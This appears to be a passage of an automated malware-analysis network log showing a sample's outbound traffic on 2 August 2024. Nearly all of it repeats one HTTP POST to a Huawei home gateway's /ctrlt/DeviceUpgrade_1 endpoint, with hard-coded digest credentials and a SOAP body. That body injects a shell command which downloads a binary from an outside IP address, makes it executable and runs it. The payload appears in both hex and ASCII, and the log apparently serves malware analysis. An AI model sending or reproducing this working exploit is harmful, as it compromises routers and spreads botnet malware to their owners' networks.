                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:20.617558002 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:36.233099937 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:18:08.999527931 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                      92192.168.2.1443782197.35.62.6937215
                                                                      TimestampBytes transferredDirectionData
                                                                      Aug 2, 2024 13:17:05.085537910 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:05.450109959 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:05.962035894 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:06.985985994 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:09.033972025 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:13.193782091 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:21.385426998 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:37.768943071 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
